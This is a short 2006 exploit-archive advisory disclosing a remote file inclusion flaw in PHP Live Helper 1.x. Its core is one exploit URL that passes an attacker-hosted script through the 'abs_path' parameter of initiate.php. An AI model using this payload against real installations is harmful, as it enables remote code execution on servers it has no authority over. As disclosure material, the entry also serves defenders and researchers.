PHP Live Helper <= 1.x (abs_path) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Live Helper <= 1.x (abs_path) Remote File Include Vulnerability
# Published : 2006-06-18
# Author : SnIpEr_SA
# Previous Title : INDEXU <= 5.0.1 (admin_template_path) Remote Include Vulnerabilities
# Next Title : Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit

---------------------------------------------------------------------------
PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHP Live Helper
version : 1.5 and last version
URL :http://www.live-helper.com/

------------------------------------------------------------------
Exploit:
~~~~~~~~

# http://www.site.com/[livehelperpath]/initiate.php?abs_path=[evil_scripts]

---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~

SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Frind
/*

-------------------------------- [ END ] ----------------------------------

# www.Syue.com [2006-06-18]